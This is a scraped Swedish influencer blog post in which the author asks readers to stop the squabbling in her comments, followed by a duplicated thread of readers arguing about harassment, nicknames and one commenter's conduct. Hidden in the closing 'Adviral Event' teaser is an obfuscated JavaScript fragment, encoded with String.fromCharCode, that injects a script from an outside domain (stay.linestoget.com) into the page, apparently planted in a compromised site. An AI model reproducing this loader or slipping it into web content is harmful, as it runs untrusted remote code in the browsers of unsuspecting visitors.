Skärpning i kommentarsfältet!

 

66CC9D33-2CAA-4D16-8466-569ABED3C36C

 

Busy, busy, busy…. 😅

Många bollar i luften, omgiven av kreativa, inspirerande människor💫🙏🏻 Konkurrensen är stenhård, utmaningarna motiverar mig! 😎

oavsett yrke, målsättning eller startpunkt så är resan mot ”målet” det absolut roligaste🙌🏻

Så…. Enjoy the Ride, and go with the flow 🧡

Tillbaka i huvudstaden. Möten, mail, och överdosering av kaffe 😅

Hösten är här. Löven är vackrare än någonsin. Även om det grått, mulet och redan börjat bli ont om dagsljus så är de där stunderna med sol på alla färgerna som skiftar i naturen… Vackert 😍D8A992D3-BD8C-46BB-9972-A8978A92BBB1

Nu. Nu måste vi ta tag i kommentarerna.

Jag vet inte vem/vilka som just nu lever rövare i kommentarsfältet.

Men en sak vet jag. Jag läser inte ens den skit som skrivs….. Jag skummar, och försöker fånga upp de ”vanliga” kommentarerna som tyvärr får lida för hur andra beter sig…. Så antingen så går det bli en drastisk ändring, eller så stänger jag av kommentarsfältet tills vidare!

Jag ställer mig INTE bakom denna dagisnivå. Jag har varken tid eller lust att sitta och ta bort, sortera och rensa……

Det tråkiga är att så få personer ( med måååånga nick-namn) tar så enormt mycket plats.

Så nu BER jag er som skriver att ta ansvar och sköta det på ett helt annat sätt 🙏🏻❤️ -deal?!

F3EAF31D-8F13-4DC7-9BD5-0FFD2EC97D48 B1E6466E-C150-491E-AFBE-F835E0E27350

Nu har jonas lagat middag, vi har ätit och jag ligger i sängen med katterna…… Sture är gosigast än gosigast ❤️
Kram & gonatt 😴

/ My Martens

76 Komentarer

 1. Om det är ett fåtal personer med olika nick så borde det ju gå stänga just dem ute?
  Jag skriver alltid under samma och gillar inte att bli ihopblandad med de andra.
  Vi är inte alltid ”överens” i allt du och jag men de gånger du svarar har du all heder av det.
  Så några ”försvarsadvokater” i kommentarsfältet behövs inte.
  De är ju blockade från andra ställen så det är väl ett alternativ även för dig, även om man kan tycka att det inte ska behövas.
  Att stänga kommentarerna tror jag vore helt förkastligt för det måste ju kunna få vara så att man kan ”bolla” tankar och idéer och vädra åsikter utan att fördenskull vara elak.

  • Jag vet… och det är INTE doig jag syftar på såklart =) Tyvärr kan man inte blockera enskilda IP nr… Hade det funkat så hade jag gjort det för längesen =)

   • Hej, såhär blockar du enskilda IP-adresser i wordpress:
    Gå in på Inställningar, klicka på Diskussion, scrolla ner till fältet ”Kommentarsgranskning”. Skriv ett IP-nummer per rad.
    Tada!

 2. Bra Moa. Det hoppas jag.
  En fråga till dig My…. Hur många ggr per år åker du iväg på såna här resor? Jag försöker eller snarare ska försöka ta tag i mitt liv (motionsmässigt) men blir på allvar förvirrad av hur mycket och vad man ska göra. Försöker få nått hum då du är PT mm. Jag hinner inte med i svängarna då jag inte är inne och läser varje inlägg.

   • Tack för svar du gav mig. Var inne på sidan. Du vet inte om det blir något framöver som inte är så långt bort? Skönt utomlands såklart men jag har inte möjlighet att fara så långt bort. Tror du det kommer något närmare när temperaturen är mer lagom lite närmre? Det kanske du vet senare. Jag går in och kollar andra sidan då och då och ser om du lägger upp nått annat. Ha en trevlig lördag.

 3. Återigen och återigen:
  Att vara influencer innebär att man vill bli allmänt känd. Det är liksom hela grejen för annars skulle man inte kunna vara en influencer. Med det följer såväl dyrkan – som avsky, från den mer osakliga mindre kritiskt tänkande delen av läsarna.
  Men – Influencers och bloggare kritiseras även alltmer av allt fler intelligenta människor med kompetens att granska bloggarna på ett sakligt sätt.
  Fokus ligger på den marknadsföring av skönhetsprodukter, skönhetspiller, hälsoresor, kläder mm mm som bloggarna tjänar storkovan på.
  Att uppmuntra till överkonsumtion av allt möjligt onödigt tjafs ifrågasätts skarpt i media numera.
  Men tyvärr verkar det att många som läser den här bloggen verkar bekymra sig mest om katterna, om var bloggaren sover, vad hon har för frukostvanor och andra privata helt meningslösa detaljer.
  Helt otroligt! Hur i hela friden kan det vara intressant i ens liv? Man känner ju inte ens bloggaren ifråga!
  Inte konstigt då att här också finns läsare som kastar ur sig vad skit som helst.
  Golvnivå är vad det är.
  Lika frågande är jag till att bloggaren tror att hon med vädjan kan få sina ’bloggläsare att skärpa sig! Som att hytta med näven åt småbarn.
  Samtidigt som hon låter sig pressas till att offentliggöra var hennes son ska bo framöver. Att informera offentligt om viktiga familjebeslut som om läsarna vore ett fåtal nära vänner- hur är det då ställt?
  Herregud säger jag bara.

 4. Om det är ett fåtal personer med olika nick så borde det ju gå stänga just dem ute?
  Jag skriver alltid under samma och gillar inte att bli ihopblandad med de andra.
  Vi är inte alltid ”överens” i allt du och jag men de gånger du svarar har du all heder av det.
  Så några ”försvarsadvokater” i kommentarsfältet behövs inte.
  De är ju blockade från andra ställen så det är väl ett alternativ även för dig, även om man kan tycka att det inte ska behövas.
  Att stänga kommentarerna tror jag vore helt förkastligt för det måste ju kunna få vara så att man kan ”bolla” tankar och idéer och vädra åsikter utan att fördenskull vara elak.

  • Jag vet… och det är INTE doig jag syftar på såklart =) Tyvärr kan man inte blockera enskilda IP nr… Hade det funkat så hade jag gjort det för längesen =)

   • Hej, såhär blockar du enskilda IP-adresser i wordpress:
    Gå in på Inställningar, klicka på Diskussion, scrolla ner till fältet ”Kommentarsgranskning”. Skriv ett IP-nummer per rad.
    Tada!

 5. Bra Moa. Det hoppas jag.

  En fråga till dig My…. Hur många ggr per år åker du iväg på såna här resor? Jag försöker eller snarare ska försöka ta tag i mitt liv (motionsmässigt) men blir på allvar förvirrad av hur mycket och vad man ska göra. Försöker få nått hum då du är PT mm. Jag hinner inte med i svängarna då jag inte är inne och läser varje inlägg.

   • Tack för svar du gav mig. Var inne på sidan. Du vet inte om det blir något framöver som inte är så långt bort? Skönt utomlands såklart men jag har inte möjlighet att fara så långt bort. Tror du det kommer något närmare när temperaturen är mer lagom lite närmre? Det kanske du vet senare. Jag går in och kollar andra sidan då och då och ser om du lägger upp nått annat. Ha en trevlig lördag.

 6. Tycker du ska blocka de som skriver under flera namn ska väl inte vara några problem eller? de som konstant kommenterar vad andra skriver, låt dina läsare tycka vad de vill och ha åsikter annars får du nog stänga ner kommentarerna för att få lugn här tror jag.

 7. Inte förvånande att vissa nick, återigen är framme och mästrar både My och mig.
  Men vi kan väl försöka ha en respektfull diskussion om fenomenet ”relationer bloggare/läsare”? Känns det okej, My, L, St och Lava?
  Min åsikt står väl väldigt klar för alla vid det här laget.
  Hur tänker ni kring att enbart uppsöka en influencer för att trycka ner dem/förtala dem?
  För mig är det fullständigt galet. Ungefär som att äta det äckligaste man vet och samtidigt grina och klaga på att det är, just äckligt.
  Vem, utom jag har ansvar för min situation?
  Hur tänker ni?
  ?️?️?️
  //Moa

  • Moa! Nu undrar jag vad du håller på med. Be My gå in och lägga ut alla mina få inlägg. Jag har inget med ert tjafs att göra. Vad blandar du in mig för? Jag sa bara bra Moa. Jag har ingenting med någon annan att göra. Jag är saklig. Jag ville ha råd av My men tydligen åker man på en snyting då. Märkligt, verkligen märkligt.

 8. Att ställa frågor är inte att trycka ner någon!
  Att ha en åsikt om det bloggaren skriver är inte att trycka ner någon!
  Att låta bloggaren själv svara är bättre än att någon påtar sig rollen som åsiktspolis, om nu inte My har bett dig göra det Moa. Men då tycker jag hon ska skriva det här på bloggen så vi andra vet.
  Om du Moa jämför det med mobbing som har skrivits här på Mys blogg undrar jag om du vet vad mobbing är, om du nu inte har insiderinformation på de kommentarer inte My visar. Men vi som läser ser bara vad My släpper igenom…

  • Tack för svar Tian!
   Jag tycker nog inte att det är konstigt att man generellt ställer frågor.
   Däremot är det, för mig konstigt att man kräver svar på frågor som inte är relevanta eller är integritetskränkande.
   Att man inte accepterar ett ”icke-svar” eller det svar man får.
   Har vi läsare rätt att kräva andra svar än de vi får?
   //Moa

  • Tian
   Gällande mobbing så handlar det enbart om det drev som pågår här.
   Det spelar ingen roll om det är en person med många nick, eller många fysiska personer. Avsikten är densamma.
   Att förminska och förgöra en annan person.
   Det kanske är bättre du söker upp info om mobbing på nätet än att vi hamnar i den diskussionen?
   De flesta, både barn och vuxna känner igen mobbing när man ” ser” det.
   Hoppas du hittar bra information som du själv kan sprida vidare.
   //Moa

 9. Jag skriver bara under med ett namn och en ip adress. Det måste vara helt upp till dig att blocka vem du vill enskilda personer eller de med flera namn och förstår i sådana fall inte varför du inte gör det? eller stänger ner kommentarsfältet för en period.
  Att ha åsikter, tycka och tänka är inte mobbning sen kan skriftligt språk aldrig bli som ett talat och folk kan lägga vad som helst i det som skrivs fast det absolut inte var skrivarens tanke. Sen måste folk sluta blanda sig i vad andra skriver ser inte alls detta i andra bloggar jag läser där får läsarna tycka och tänka utan att det ska ältas, missförstås och försvaras av andra.

  • God morgon Mollan!
   Snälla, kan du inte bara släppa IP-nr? Det bevisar ju ingenting, eller hur? Det vet du ju! ?
   Släpp också instruktionerna till andra vad de ska tycka/tänka/göra/inte göra. Vi vet redan allt det där. ??
   Hur tänker du om mina frågor?
   Uppriktigt: Ha en fin dag!
   //Moa

   • Jag skrev också att man ska sluta kommentera andra och ber dig nu Moa att låta mig vara ifred och tycka vad jag vill framöver. TACK

    • Mollan
     Så är det ibland. Man kan helt enkelt inte stå upp för sig själv och sina handlingar.
     Ett ickesvar så gott som något. ??
     Mvh
     //Moa

 10. Återigen och återigen:
  Att vara influencer innebär att man vill bli allmänt känd. Det är liksom hela grejen för annars skulle man inte kunna vara en influencer. Med det följer såväl dyrkan – som avsky, från den mer osakliga mindre kritiskt tänkande delen av läsarna.

  Men – Influencers och bloggare kritiseras även alltmer av allt fler intelligenta människor med kompetens att granska bloggarna på ett sakligt sätt.
  Fokus ligger på den marknadsföring av skönhetsprodukter, skönhetspiller, hälsoresor, kläder mm mm som bloggarna tjänar storkovan på.
  Att uppmuntra till överkonsumtion av allt möjligt onödigt tjafs ifrågasätts skarpt i media numera.
  Men tyvärr verkar det att många som läser den här bloggen verkar bekymra sig mest om katterna, om var bloggaren sover, vad hon har för frukostvanor och andra privata helt meningslösa detaljer.
  Helt otroligt! Hur i hela friden kan det vara intressant i ens liv? Man känner ju inte ens bloggaren ifråga!
  Inte konstigt då att här också finns läsare som kastar ur sig vad skit som helst.
  Golvnivå är vad det är.
  Lika frågande är jag till att bloggaren tror att hon med vädjan kan få sina ’bloggläsare att skärpa sig! Som att hytta med näven åt småbarn.
  Samtidigt som hon låter sig pressas till att offentliggöra var hennes son ska bo framöver. Att informera offentligt om viktiga familjebeslut som om läsarna vore ett fåtal nära vänner- hur är det då ställt?
  Herregud säger jag bara.

 11. Tycker du ska blocka de som skriver under flera namn ska väl inte vara några problem eller? de som konstant kommenterar vad andra skriver, låt dina läsare tycka vad de vill och ha åsikter annars får du nog stänga ner kommentarerna för att få lugn här tror jag.

 12. Inte förvånande att vissa nick, återigen är framme och mästrar både My och mig.

  Men vi kan väl försöka ha en respektfull diskussion om fenomenet ”relationer bloggare/läsare”? Känns det okej, My, L, St och Lava?

  Min åsikt står väl väldigt klar för alla vid det här laget.

  Hur tänker ni kring att enbart uppsöka en influencer för att trycka ner dem/förtala dem?

  För mig är det fullständigt galet. Ungefär som att äta det äckligaste man vet och samtidigt grina och klaga på att det är, just äckligt.

  Vem, utom jag har ansvar för min situation?

  Hur tänker ni?

  🏳️🏳️🏳️

  //Moa

  • Moa! Nu undrar jag vad du håller på med. Be My gå in och lägga ut alla mina få inlägg. Jag har inget med ert tjafs att göra. Vad blandar du in mig för? Jag sa bara bra Moa. Jag har ingenting med någon annan att göra. Jag är saklig. Jag ville ha råd av My men tydligen åker man på en snyting då. Märkligt, verkligen märkligt.

 13. Men alltså katterna❤️Vilka gosbollar..
  Jag tror tyvärr inte det kommer bli bättre här inne. Misstänker att de här människorna har diagnoser och har inte förmågan att förstå ditt budskap. Men man ska aldrig ge upp hoppet?

 14. Att ställa frågor är inte att trycka ner någon!
  Att ha en åsikt om det bloggaren skriver är inte att trycka ner någon!
  Att låta bloggaren själv svara är bättre än att någon påtar sig rollen som åsiktspolis, om nu inte My har bett dig göra det Moa. Men då tycker jag hon ska skriva det här på bloggen så vi andra vet.

  Om du Moa jämför det med mobbing som har skrivits här på Mys blogg undrar jag om du vet vad mobbing är, om du nu inte har insiderinformation på de kommentarer inte My visar. Men vi som läser ser bara vad My släpper igenom…

  • Tack för svar Tian!

   Jag tycker nog inte att det är konstigt att man generellt ställer frågor.

   Däremot är det, för mig konstigt att man kräver svar på frågor som inte är relevanta eller är integritetskränkande.

   Att man inte accepterar ett ”icke-svar” eller det svar man får.

   Har vi läsare rätt att kräva andra svar än de vi får?

   //Moa

  • Tian

   Gällande mobbing så handlar det enbart om det drev som pågår här.

   Det spelar ingen roll om det är en person med många nick, eller många fysiska personer. Avsikten är densamma.

   Att förminska och förgöra en annan person.

   Det kanske är bättre du söker upp info om mobbing på nätet än att vi hamnar i den diskussionen?

   De flesta, både barn och vuxna känner igen mobbing när man ” ser” det.

   Hoppas du hittar bra information som du själv kan sprida vidare.

   //Moa

 15. Jag skriver bara under med ett namn och en ip adress. Det måste vara helt upp till dig att blocka vem du vill enskilda personer eller de med flera namn och förstår i sådana fall inte varför du inte gör det? eller stänger ner kommentarsfältet för en period.
  Att ha åsikter, tycka och tänka är inte mobbning sen kan skriftligt språk aldrig bli som ett talat och folk kan lägga vad som helst i det som skrivs fast det absolut inte var skrivarens tanke. Sen måste folk sluta blanda sig i vad andra skriver ser inte alls detta i andra bloggar jag läser där får läsarna tycka och tänka utan att det ska ältas, missförstås och försvaras av andra.

  • God morgon Mollan!

   Snälla, kan du inte bara släppa IP-nr? Det bevisar ju ingenting, eller hur? Det vet du ju! 😊

   Släpp också instruktionerna till andra vad de ska tycka/tänka/göra/inte göra. Vi vet redan allt det där. 👍🏽

   Hur tänker du om mina frågor?

   Uppriktigt: Ha en fin dag!

   //Moa

    • Mollan

     Så är det ibland. Man kan helt enkelt inte stå upp för sig själv och sina handlingar.

     Ett ickesvar så gott som något. 👍🏽

     Mvh

     //Moa

 16. Moa nu upprepar samma sak hela tiden och ställer samma frågor i inlägg efter inlägg. Du kanske ska föregå med gott exempel och göra det du ber andra dvs om du inte får svar på dina frågor, lämna det.

  • Njae Christina, det har jag nog inte gjort, mer påstått.
   Dock förväntar mig nog inga vettiga svar eller öppen diskussion.
   Det här handlar inte om människor som är omedvetna om vad de gör eller kan känna ett intresse av utbyte av andras åsikter. Det här handlar om människor ( några få) som är väl medvetna om vad de gör och har ett ont syfte. För att uppnå det är de beredda att gå hur långt som helst.
   Vet att de själva har barn och familjer. Tycker det är oerhört solkigt och sorgligt att de uppvisar sån brist på ryggrad och moral i hela sin uppenbarelse. Dom skämmer ut sig själva, sina barn ( blir lätt illamående när jag betänker att deras barn får reda på det här ?). Eller att de har sån brist i empati att de inte undviker att ge sig på ett barn eller hans pappafamilj i kampen att försöka bryta ner hans mamma.
   Det är helt crazy, det finns inga vettiga svar. Så nej, jag förväntar mig inga svar och kommer inte ställa frågorna igen.
   Jag frågade vettigt, vuxet och artigt om diskussionen. Läs svaren och fundera på vad det egentliga problemet är.
   Det står nog ganska klart för oss ”normalstörda” vem som är det egentliga problemet.
   Mer behöver väl inte sägas?
   //Moa

   • Hej Moa
    Du skriver citat” vet att de själva har barn och familjer”
    En nyfiken fråga, hur vet du det?
    Jag tycker det är bra/fint att du tar My i försvar när det kommer påhopp, elaka kommentarer mm.
    Men jag uppfattar ofta dina kommentarer som ganska aggressiva och provokativa.
    Det är såklart min personliga åsikt och får stå för mig.
    Jag är inte ute efter att bråka eller tjafsa vare sig med dig eller någon annan här och självklart behöver du inte svara på mina frågor
    Men om vi alla ska ta vårt personliga ansvar för ett bättre ” klimat” här i bloggen så vore det iaf från min sida önskvärt att du ” taggar” ner lite. OBS inget illa ment

    • Ingen fara Lena P!
     Klart jag kan svara på dina vänligt ställda frågor!
     Det är så enkelt att jag vet vilka de är.
     Det finns inget annat syfte att påpeka att barn finns med annat än att poängtera att vuxna kvinnor med ansvar att vägleda barn in i vuxenlivet beter sig så här illa. Deras barn är lika oskyldiga till allt som Mys barn är. Det är allas skyldighet att lämna dem utanför vuxentjafs.
     Förstår att min ton lätt kan misstolkas i text. Egentligen är den inte ett dugg annorlunda IRL. Dock tillkommer mimik, ögonkontakt och gester som ytterligare en ingrediens. Och uppriktigt sagt så är jag en person som uppfattas som rak och enkel i min kommunikation. Dessutom ganska glad och skämtsam.
     Men absolut förstår jag hur jag kan uppfattas vass/moppsig/onandon.
     Har oftast inga problem att stå upp för min åsikt/vad jag skriver. Men ibland kan jag ändå ångra mig när jag kör mina metoder: in i fällan bara. Vissa har inte förmågan att se/känna av. Varför så viktigt att klä av dem då?
     Kan tänka på vad Astrid Lindgren brukade säga: Om man är väldigt stark, då måste man vara väldigt snäll. Så där får jag skärpa mig!
     Eller, självklart ska jag betänka allt du säger och hoppas du kan läsa det jag skriver med samma betänkande. Att du kanske, kanske kan ana en annan Moa än den du t

     • Nu måste jag bara fråga dig Moa, om du vet vem vi/jag är som du säger så ger jag dig tillstånd att säga min bostadskommun.
      Du tror att jag och vi som du buntar ihop till en och samma person är Magdalena Graaf och hennes kompisar, vart har du fått den befängda tanken ifrån?
      Du förminskar Mys förmåga att skriva en intressant blogg genom att anklaga alla för att vara samma person, det kan inte vara så trevligt för My att hon inte lockar andra läsare än systrarna Graaf och vänner.
      Har du tänkt på det när du tar över hela bloggen, du har helt enkelt kapat den…

     • Du får också mer än gärna tala om var jag bor och hur många barn jag har helt ok.
      My varför säger du inget om Moa här som verkar ha tagit över din blogg, innan det blir samma visa igen, 9 kommentarer fram tills nu.

 17. Men alltså katterna❤️Vilka gosbollar..

  Jag tror tyvärr inte det kommer bli bättre här inne. Misstänker att de här människorna har diagnoser och har inte förmågan att förstå ditt budskap. Men man ska aldrig ge upp hoppet👍

 18. Moa nu upprepar samma sak hela tiden och ställer samma frågor i inlägg efter inlägg. Du kanske ska föregå med gott exempel och göra det du ber andra dvs om du inte får svar på dina frågor, lämna det.

  • Njae Christina, det har jag nog inte gjort, mer påstått.

   Dock förväntar mig nog inga vettiga svar eller öppen diskussion.

   Det här handlar inte om människor som är omedvetna om vad de gör eller kan känna ett intresse av utbyte av andras åsikter. Det här handlar om människor ( några få) som är väl medvetna om vad de gör och har ett ont syfte. För att uppnå det är de beredda att gå hur långt som helst.

   Vet att de själva har barn och familjer. Tycker det är oerhört solkigt och sorgligt att de uppvisar sån brist på ryggrad och moral i hela sin uppenbarelse. Dom skämmer ut sig själva, sina barn ( blir lätt illamående när jag betänker att deras barn får reda på det här 😔). Eller att de har sån brist i empati att de inte undviker att ge sig på ett barn eller hans pappafamilj i kampen att försöka bryta ner hans mamma.

   Det är helt crazy, det finns inga vettiga svar. Så nej, jag förväntar mig inga svar och kommer inte ställa frågorna igen.

   Jag frågade vettigt, vuxet och artigt om diskussionen. Läs svaren och fundera på vad det egentliga problemet är.

   Det står nog ganska klart för oss ”normalstörda” vem som är det egentliga problemet.

   Mer behöver väl inte sägas?

   //Moa

   • Hej Moa
    Du skriver citat” vet att de själva har barn och familjer”
    En nyfiken fråga, hur vet du det?
    Jag tycker det är bra/fint att du tar My i försvar när det kommer påhopp, elaka kommentarer mm.
    Men jag uppfattar ofta dina kommentarer som ganska aggressiva och provokativa.
    Det är såklart min personliga åsikt och får stå för mig.
    Jag är inte ute efter att bråka eller tjafsa vare sig med dig eller någon annan här och självklart behöver du inte svara på mina frågor
    Men om vi alla ska ta vårt personliga ansvar för ett bättre ” klimat” här i bloggen så vore det iaf från min sida önskvärt att du ” taggar” ner lite. OBS inget illa ment

    • Ingen fara Lena P!

     Klart jag kan svara på dina vänligt ställda frågor!

     Det är så enkelt att jag vet vilka de är.

     Det finns inget annat syfte att påpeka att barn finns med annat än att poängtera att vuxna kvinnor med ansvar att vägleda barn in i vuxenlivet beter sig så här illa. Deras barn är lika oskyldiga till allt som Mys barn är. Det är allas skyldighet att lämna dem utanför vuxentjafs.

     Förstår att min ton lätt kan misstolkas i text. Egentligen är den inte ett dugg annorlunda IRL. Dock tillkommer mimik, ögonkontakt och gester som ytterligare en ingrediens. Och uppriktigt sagt så är jag en person som uppfattas som rak och enkel i min kommunikation. Dessutom ganska glad och skämtsam.

     Men absolut förstår jag hur jag kan uppfattas vass/moppsig/onandon.

     Har oftast inga problem att stå upp för min åsikt/vad jag skriver. Men ibland kan jag ändå ångra mig när jag kör mina metoder: in i fällan bara. Vissa har inte förmågan att se/känna av. Varför så viktigt att klä av dem då?

     Kan tänka på vad Astrid Lindgren brukade säga: Om man är väldigt stark, då måste man vara väldigt snäll. Så där får jag skärpa mig!

     Eller, självklart ska jag betänka allt du säger och hoppas du kan läsa det jag skriver med samma betänkande. Att du kanske, kanske kan ana en annan Moa än den du t

     • Nu måste jag bara fråga dig Moa, om du vet vem vi/jag är som du säger så ger jag dig tillstånd att säga min bostadskommun.

      Du tror att jag och vi som du buntar ihop till en och samma person är Magdalena Graaf och hennes kompisar, vart har du fått den befängda tanken ifrån?
      Du förminskar Mys förmåga att skriva en intressant blogg genom att anklaga alla för att vara samma person, det kan inte vara så trevligt för My att hon inte lockar andra läsare än systrarna Graaf och vänner.

      Har du tänkt på det när du tar över hela bloggen, du har helt enkelt kapat den…

     • Du får också mer än gärna tala om var jag bor och hur många barn jag har helt ok.
      My varför säger du inget om Moa här som verkar ha tagit över din blogg, innan det blir samma visa igen, 9 kommentarer fram tills nu.

 19. Spooky att du börjar dra in barnen till de som kommentarer. Spooky att du vet om vi som kommentarer har barn eller inte. De flesta har väl någon form av familj. Helt ovidkommande i sammanhanget. Lämnar det så.

 20. Spooky att du börjar dra in barnen till de som kommentarer. Spooky att du vet om vi som kommentarer har barn eller inte. De flesta har väl någon form av familj. Helt ovidkommande i sammanhanget. Lämnar det så.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/